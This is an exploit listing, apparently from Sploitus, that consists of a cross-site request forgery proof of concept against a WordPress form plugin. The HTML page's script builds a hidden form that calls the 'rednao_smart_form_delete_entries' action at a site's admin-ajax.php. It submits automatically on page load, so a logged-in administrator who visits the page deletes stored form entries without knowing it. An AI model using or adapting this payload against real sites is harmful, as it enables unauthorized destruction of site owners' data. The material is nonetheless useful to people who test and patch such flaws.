Share
## https://sploitus.com/exploit?id=WPEX-ID:B514B631-C3E3-4793-AB5D-35ED0C38B011
<!DOCTYPE html>
<html>
<body>
<script>
const formData = new FormData();
formData.append('action', 'rednao_smart_form_delete_entries');
formData.append('data', '{"Ids":["1","2"]}');
const csrfForm = document.createElement('form');
csrfForm.method = 'POST';
csrfForm.action = 'https://example.com/wp-admin/admin-ajax.php';
csrfForm.enctype = 'multipart/form-data';
const boundary = '----WebKitFormBoundaryAFcqGF5eShv7ARup';
csrfForm.setAttribute('boundary', boundary);
for (const pair of formData) {
const input = document.createElement('input');
input.type = 'hidden';
input.name = pair[0];
input.value = pair[1];
csrfForm.appendChild(input);
}
document.body.appendChild(csrfForm);
csrfForm.submit();
</script>
</body>
</html>